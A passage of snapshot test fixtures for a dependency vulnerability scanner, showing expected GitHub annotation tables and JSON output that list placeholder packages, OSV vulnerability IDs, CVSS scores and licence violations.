file=path/to/my/second/lockfile::path/to/my/second/lockfile%0A+---------------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION 
| FIXED VERSION |%0A+---------------+-----------------------+------+-----------------+---------------+%0A| mine2 | https://osv.dev/OSV-2 | | 3.2.5 | |%0A| author3/mine3 | https://osv.dev/OSV-3 | 4.3 | 0.4.1 | |%0A| author3/mine3 | https://osv.dev/OSV-5 | | 0.4.1 | |%0A+---------------+-----------------------+------+-----------------+---------------+ --- [TestPrintGHAnnotationReport_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_and_multiple_vulnerabilities,_but_some_uncalled - 1] ::error file=path/to/my/first/lockfile::path/to/my/first/lockfile%0A+---------------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------------+-----------------------+------+-----------------+---------------+%0A| author1/mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A| author1/mine1 | https://osv.dev/OSV-5 | | 1.2.3 | |%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.2 | |%0A+---------------+-----------------------+------+-----------------+---------------+::error file=path/to/my/second/lockfile::path/to/my/second/lockfile%0A+---------------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------------+-----------------------+------+-----------------+---------------+%0A| mine2 | https://osv.dev/OSV-2 | | 3.2.5 | |%0A| author3/mine3 | https://osv.dev/OSV-3 | | 0.4.1 | |%0A| author3/mine3 | https://osv.dev/OSV-5 | | 0.4.1 | |%0A+---------------+-----------------------+------+-----------------+---------------+ --- [TestPrintGHAnnotationReport_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems_using_commits_and_version,_and_multiple_vulnerabilities - 1] ::error file=path/to/my/first/lockfile::path/to/my/first/lockfile%0A+---------------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | 
CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------------+-----------------------+------+-----------------+---------------+%0A| author1/mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A| author1/mine1 | https://osv.dev/OSV-5 | | 1.2.3 | |%0A| mine1 | https://osv.dev/OSV-1 | | | |%0A+---------------+-----------------------+------+-----------------+---------------+::error file=path/to/my/second/lockfile::path/to/my/second/lockfile%0A+---------------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------------+-----------------------+------+-----------------+---------------+%0A| mine2 | https://osv.dev/OSV-2 | | 3.2.5 | |%0A| author3/mine3 | https://osv.dev/OSV-3 | | 0.4.1 | |%0A| author3/mine3 | https://osv.dev/OSV-5 | | 0.4.1 | |%0A+---------------+-----------------------+------+-----------------+---------------+ --- [TestPrintGHAnnotationReport_WithVulnerabilities/multiple_sources_with_no_packages - 1] --- [TestPrintGHAnnotationReport_WithVulnerabilities/no_sources - 1] --- [TestPrintGHAnnotationReport_WithVulnerabilities/one_source_with_no_packages - 1] --- [TestPrintGHAnnotationReport_WithVulnerabilities/one_source_with_one_package,_no_vulnerabilities - 1] --- [TestPrintGHAnnotationReport_WithVulnerabilities/one_source_with_one_package,_one_uncalled_vulnerability,_and_one_called_vulnerability - 1] ::error file=path/to/my/first/lockfile::path/to/my/first/lockfile%0A+---------+--------------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+--------------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A| mine1 | https://osv.dev/GHSA-123 | | 1.2.3 | |%0A+---------+--------------------------+------+-----------------+---------------+ --- 
[TestPrintGHAnnotationReport_WithVulnerabilities/one_source_with_one_package,_one_vulnerability,_and_a_max_severity - 1] ::error file=path/to/my/first/lockfile::path/to/my/first/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | 9 | 1.2.3 | |%0A+---------+-----------------------+------+-----------------+---------------+ --- [TestPrintGHAnnotationReport_WithVulnerabilities/one_source_with_one_package_and_one_called_vulnerability - 1] ::error file=path/to/my/first/lockfile::path/to/my/first/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A+---------+-----------------------+------+-----------------+---------------+ --- [TestPrintGHAnnotationReport_WithVulnerabilities/one_source_with_one_package_and_one_uncalled_vulnerability - 1] ::error file=path/to/my/first/lockfile::path/to/my/first/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A+---------+-----------------------+------+-----------------+---------------+ --- [TestPrintGHAnnotationReport_WithVulnerabilities/one_source_with_one_package_and_one_vulnerability - 1] ::error file=path/to/my/first/lockfile::path/to/my/first/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION 
|%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A+---------+-----------------------+------+-----------------+---------------+ --- [TestPrintGHAnnotationReport_WithVulnerabilities/one_source_with_one_package_and_one_vulnerability_(dev) - 1] ::error file=path/to/my/first/lockfile::path/to/my/first/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A+---------+-----------------------+------+-----------------+---------------+ --- [TestPrintGHAnnotationReport_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_uncalled_vulnerability - 1] ::error file=path/to/my/first/lockfile::path/to/my/first/lockfile%0A+---------+--------------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+--------------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A| | https://osv.dev/GHSA-123 | | | |%0A+---------+--------------------------+------+-----------------+---------------+ --- [TestPrintGHAnnotationReport_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_vulnerability_with_a_max_severity - 1] ::error file=path/to/my/first/lockfile::path/to/my/first/lockfile%0A+---------+--------------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+--------------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | 8.3 | 1.2.3 | |%0A| | https://osv.dev/GHSA-123 | | | |%0A+---------+--------------------------+------+-----------------+---------------+ --- 
[TestPrintGHAnnotationReport_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_vulnerability_without_a_max_severity - 1] ::error file=path/to/my/first/lockfile::path/to/my/first/lockfile%0A+---------+--------------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+--------------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A| | https://osv.dev/GHSA-123 | | | |%0A+---------+--------------------------+------+-----------------+---------------+ --- [TestPrintGHAnnotationReport_WithVulnerabilities/one_source_with_one_package_with_both_a_version_and_commit_and_one_vulnerability - 1] ::error file=path/to/my/first/lockfile::path/to/my/first/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A+---------+-----------------------+------+-----------------+---------------+ --- [TestPrintGHAnnotationReport_WithVulnerabilities/one_source_with_one_package_with_just_a_commit_and_one_vulnerability - 1] ::error file=path/to/my/first/lockfile::path/to/my/first/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | | | |%0A+---------+-----------------------+------+-----------------+---------------+ --- [TestPrintGHAnnotationReport_WithVulnerabilities/one_source_with_vulnerabilities,_some_missing_content - 1] ::error file=path/to/my/first/lockfile::path/to/my/first/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE 
| VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A| mine3 | https://osv.dev/OSV-2 | | 0.10.2-rc | |%0A+---------+-----------------------+------+-----------------+---------------+ --- [TestPrintGHAnnotationReport_WithVulnerabilities/two_sources_with_packages,_one_vulnerability - 1] ::error file=path/to/my/first/lockfile::path/to/my/first/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A+---------+-----------------------+------+-----------------+---------------+ --- [TestPrintGHAnnotationReport_WithVulnerabilities/two_sources_with_the_same_vulnerable_package - 1] ::error file=path/to/my/first/lockfile::path/to/my/first/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A+---------+-----------------------+------+-----------------+---------------+::error file=path/to/my/second/lockfile::path/to/my/second/lockfile%0A+---------+-----------------------+------+-----------------+---------------+%0A| PACKAGE | VULNERABILITY ID | CVSS | CURRENT VERSION | FIXED VERSION |%0A+---------+-----------------------+------+-----------------+---------------+%0A| mine1 | https://osv.dev/OSV-1 | | 1.2.3 | |%0A+---------+-----------------------+------+-----------------+---------------+ --- ================================================ FILE: internal/output/__snapshots__/machinejson_test.snap ================================================ 
[TestPrintJSONResults_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_no_license_violations - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "licenses": [ "ISC" ] } ] }, { "source": { "path": "/path/to/my/second/lockfile", "type": "sbom" }, "packages": [ { "package": { "name": "mine2", "version": "3.2.5", "ecosystem": "npm" }, "licenses": [ "ISC" ] }, { "package": { "name": "mine3", "version": "0.4.1", "ecosystem": "npm" }, "licenses": [ "ISC" ] } ] }, { "source": { "path": "/path/to/my/third/lockfile", "type": "unknown" }, "packages": [ { "package": { "name": "mine1", "version": "1.3.5", "ecosystem": "npm" }, "licenses": [ "ISC" ] }, { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "licenses": [ "ISC" ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": [ "ISC" ] } } } --- [TestPrintJSONResults_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_some_license_violations - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "licenses": [ "MIT" ], "license_violations": [ "MIT" ] } ] }, { "source": { "path": "/path/to/my/second/lockfile", "type": "sbom" }, "packages": [ { "package": { "name": "mine2", "version": "3.2.5", "ecosystem": "npm" }, "licenses": [ "Apache-2.0" ], "license_violations": [ "Apache-2.0" ] }, { "package": { "name": "mine3", "version": "0.4.1", "ecosystem": "npm" }, "licenses": [ "ISC" ] } ] }, { "source": { "path": "/path/to/my/third/lockfile", "type": "unknown" }, "packages": [ { "package": { "name": "mine1", "version": "1.3.5", "ecosystem": "npm" }, "licenses": [ "ISC" ] }, { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "licenses": [ "MIT" ], "license_violations": [ 
"MIT" ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": [ "ISC" ] } } } --- [TestPrintJSONResults_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_some_license_violations#01 - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "licenses": [ "MIT", "Apache-2.0" ], "license_violations": [ "MIT" ] } ] }, { "source": { "path": "/path/to/my/second/lockfile", "type": "sbom" }, "packages": [ { "package": { "name": "mine2", "version": "3.2.5", "ecosystem": "npm" }, "licenses": [ "UNKNOWN" ], "license_violations": [ "UNKNOWN" ] }, { "package": { "name": "mine3", "version": "0.4.1", "ecosystem": "npm" }, "licenses": [ "Apache-2.0" ] } ] }, { "source": { "path": "/path/to/my/third/lockfile", "type": "unknown" }, "packages": [ { "package": { "name": "mine1", "version": "1.3.5", "ecosystem": "npm" }, "licenses": [ "Apache-2.0" ] }, { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "licenses": [ "MIT" ], "license_violations": [ "MIT" ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestPrintJSONResults_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_some_license_violations - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "author1/mine1", "version": "1.2.3", "ecosystem": "Packagist" }, "licenses": [ "MIT" ], "license_violations": [ "MIT" ] } ] }, { "source": { "path": "/path/to/my/second/lockfile", "type": "sbom" }, "packages": [ { "package": { "name": "mine2", "version": "3.2.5", "ecosystem": "npm" }, "licenses": [ "Apache-2.0" ], "license_violations": [ "Apache-2.0" ] }, { "package": { "name": "mine3", "version": "0.4.1", "ecosystem": "npm" }, "licenses": [ "ISC" ] } ] }, { "source": { "path": 
"/path/to/my/third/lockfile", "type": "unknown" }, "packages": [ { "package": { "name": "mine1", "version": "1.3.5", "ecosystem": "NuGet" }, "licenses": [ "ISC" ] }, { "package": { "name": "author1/mine1", "version": "1.2.3", "ecosystem": "Packagist" }, "dependency_groups": [ "dev" ], "licenses": [ "MIT" ], "license_violations": [ "MIT" ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": [ "ISC" ] } } } --- [TestPrintJSONResults_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages_and_groups,_some_license_violations - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "dependency_groups": [ "dev", "optional" ], "licenses": [ "MIT" ], "license_violations": [ "MIT" ] } ] }, { "source": { "path": "/path/to/my/second/lockfile", "type": "sbom" }, "packages": [ { "package": { "name": "mine2", "version": "3.2.5", "ecosystem": "npm" }, "dependency_groups": [ "dev", "optional" ], "licenses": [ "Apache-2.0" ], "license_violations": [ "Apache-2.0" ] }, { "package": { "name": "mine3", "version": "0.4.1", "ecosystem": "npm" }, "licenses": [ "ISC" ] } ] }, { "source": { "path": "/path/to/my/third/lockfile", "type": "unknown" }, "packages": [ { "package": { "name": "mine1", "version": "1.3.5", "ecosystem": "npm" }, "licenses": [ "ISC" ] }, { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "dependency_groups": [ "build" ], "licenses": [ "MIT" ], "license_violations": [ "MIT" ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": [ "ISC" ] } } } --- [TestPrintJSONResults_WithLicenseViolations/multiple_sources_with_no_packages - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [] }, { "source": { "path": "/path/to/my/second/lockfile", "type": "sbom" }, "packages": [] }, { "source": { "path": 
"/path/to/my/third/lockfile", "type": "unknown" }, "packages": [] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": [ "ISC" ] } } } --- [TestPrintJSONResults_WithLicenseViolations/no_sources - 1] { "results": [], "experimental_config": { "licenses": { "summary": false, "allowlist": [ "ISC" ] } } } --- [TestPrintJSONResults_WithLicenseViolations/one_source_with_no_packages - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": [ "ISC" ] } } } --- [TestPrintJSONResults_WithLicenseViolations/one_source_with_one_package,_no_license_violations - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "licenses": [ "ISC" ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": [ "ISC" ] } } } --- [TestPrintJSONResults_WithLicenseViolations/one_source_with_one_package,_no_licenses - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" } } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": [ "ISC" ] } } } --- [TestPrintJSONResults_WithLicenseViolations/one_source_with_one_package_and_an_unknown_license - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "licenses": [ "UNKNOWN" ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": [ "ISC" ] } } } --- [TestPrintJSONResults_WithLicenseViolations/one_source_with_one_package_and_multiple_license_violations - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { 
"name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "licenses": [ "MIT", "Apache-2.0" ], "license_violations": [ "MIT", "Apache-2.0" ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": [ "ISC" ] } } } --- [TestPrintJSONResults_WithLicenseViolations/one_source_with_one_package_and_one_license_violation - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "licenses": [ "MIT" ], "license_violations": [ "MIT" ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": [ "ISC" ] } } } --- [TestPrintJSONResults_WithLicenseViolations/one_source_with_one_package_and_one_license_violation_(dev) - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "dependency_groups": [ "dev" ], "licenses": [ "MIT" ], "license_violations": [ "MIT" ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": [ "ISC" ] } } } --- [TestPrintJSONResults_WithLicenseViolations/one_source_with_one_package_with_both_a_version_and_a_commit_and_one_license_violation - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm", "commit": "abc123" }, "licenses": [ "MIT" ], "license_violations": [ "MIT" ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": [ "ISC" ] } } } --- [TestPrintJSONResults_WithLicenseViolations/one_source_with_one_package_with_just_a_commit_and_one_license_violation - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "", "ecosystem": "npm", "commit": "abc123" }, "licenses": [ "MIT" ], "license_violations": [ 
"MIT" ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": [ "ISC" ] } } } --- [TestPrintJSONResults_WithLicenseViolations/two_sources_with_packages,_one_license_violation - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "licenses": [ "MIT" ], "license_violations": [ "MIT" ] } ] }, { "source": { "path": "/path/to/my/second/lockfile", "type": "sbom" }, "packages": [ { "package": { "name": "mine2", "version": "5.9.0", "ecosystem": "npm" }, "licenses": [ "ISC" ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": [ "ISC" ] } } } --- [TestPrintJSONResults_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages,_some_called_vulnerabilities_and_license_violations - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "experimental_analysis": { "OSV-1": { "called": false, "unimportant": false } }, "max_severity": "7.8" } ], "licenses": [ "MIT" ], "license_violations": [ "MIT" ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" } ] } ] }, { "source": { "path": "/path/to/my/second/lockfile", "type": "sbom" }, "packages": [ { "package": { "name": "mine2", "version": "3.2.5", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-2" ], "aliases": null, "experimental_analysis": { "OSV-2": { "called": true, "unimportant": false } }, "max_severity": "" } ], "licenses": [ "ISC" ], "vulnerabilities": [ { "id": "OSV-2", "severity": [ { "score": "1" } ], "summary": "Something less scary!" 
} ] }, { "package": { "name": "mine3", "version": "0.4.1", "ecosystem": "npm" }, "licenses": [ "ISC" ] } ] }, { "source": { "path": "/path/to/my/third/lockfile", "type": "unknown" }, "packages": [ { "package": { "name": "mine1", "version": "1.3.5", "ecosystem": "npm" }, "licenses": [ "MIT" ], "license_violations": [ "MIT" ] }, { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "experimental_analysis": { "OSV-1": { "called": false, "unimportant": false } }, "max_severity": "" } ], "licenses": [ "Apache-2.0" ], "license_violations": [ "Apache-2.0" ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": [ "ISC" ] } } } --- [TestPrintJSONResults_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages,_some_vulnerabilities_and_license_violations - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "max_severity": "" } ], "licenses": [ "MIT" ], "license_violations": [ "MIT" ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" } ] } ] }, { "source": { "path": "/path/to/my/second/lockfile", "type": "sbom" }, "packages": [ { "package": { "name": "mine2", "version": "3.2.5", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-2" ], "aliases": null, "max_severity": "" } ], "licenses": [ "ISC" ], "vulnerabilities": [ { "id": "OSV-2", "severity": [ { "score": "1" } ], "summary": "Something less scary!" 
} ] }, { "package": { "name": "mine3", "version": "0.4.1", "ecosystem": "npm" }, "licenses": [ "ISC" ] } ] }, { "source": { "path": "/path/to/my/third/lockfile", "type": "unknown" }, "packages": [ { "package": { "name": "mine1", "version": "1.3.5", "ecosystem": "npm" }, "licenses": [ "MIT" ], "license_violations": [ "MIT" ] }, { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "max_severity": "" } ], "licenses": [ "Apache-2.0" ], "license_violations": [ "Apache-2.0" ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": [ "ISC" ] } } } --- [TestPrintJSONResults_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages_with_versions_and_commits,_some_vulnerabilities_and_license_violations - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm", "commit": "abcxzy" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "max_severity": "" } ], "licenses": [ "MIT" ], "license_violations": [ "MIT" ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" } ] } ] }, { "source": { "path": "/path/to/my/second/lockfile", "type": "sbom" }, "packages": [ { "package": { "name": "mine2", "version": "", "ecosystem": "npm", "commit": "abc123" }, "groups": [ { "ids": [ "OSV-2" ], "aliases": null, "max_severity": "" } ], "licenses": [ "ISC" ], "vulnerabilities": [ { "id": "OSV-2", "severity": [ { "score": "1" } ], "summary": "Something less scary!" 
} ] }, { "package": { "name": "mine3", "version": "0.4.1", "ecosystem": "npm" }, "licenses": [ "ISC" ] } ] }, { "source": { "path": "/path/to/my/third/lockfile", "type": "unknown" }, "packages": [ { "package": { "name": "mine1", "version": "1.3.5", "ecosystem": "npm" }, "licenses": [ "MIT" ], "license_violations": [ "MIT" ] }, { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "max_severity": "" } ], "licenses": [ "Apache-2.0" ], "license_violations": [ "Apache-2.0" ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": [ "ISC" ] } } } --- [TestPrintJSONResults_WithMixedIssues/one_source_in_working_directory_with_one_package,_one_vulnerability,_and_one_license_violation - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "max_severity": "" } ], "licenses": [ "MIT" ], "license_violations": [ "MIT" ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" 
} ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": [ "ISC" ] } } } --- [TestPrintJSONResults_WithMixedIssues/one_source_with_one_deprecated_package - 1] { "results": [ { "source": { "path": "/path/to/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "deprecated-pkg", "version": "1.0.0", "ecosystem": "npm", "deprecated": true } } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestPrintJSONResults_WithMixedIssues/one_source_with_one_package,_one_called_vulnerability,_and_one_license_violation - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "experimental_analysis": { "OSV-1": { "called": true, "unimportant": false } }, "max_severity": "" } ], "licenses": [ "MIT" ], "license_violations": [ "MIT" ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": [ "ISC" ] } } } --- [TestPrintJSONResults_WithMixedIssues/one_source_with_one_package,_one_uncalled_vulnerability,_and_one_license_violation - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "experimental_analysis": { "OSV-1": { "called": false, "unimportant": false } }, "max_severity": "" } ], "licenses": [ "MIT" ], "license_violations": [ "MIT" ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" 
} ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": [ "ISC" ] } } } --- [TestPrintJSONResults_WithMixedIssues/one_source_with_one_package,_one_vulnerability,_and_one_license_violation - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "max_severity": "" } ], "licenses": [ "MIT" ], "license_violations": [ "MIT" ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": [ "ISC" ] } } } --- [TestPrintJSONResults_WithMixedIssues/two_sources_with_packages,_one_vulnerability,_one_license_violation - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "max_severity": "" } ], "licenses": [ "ISC" ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" 
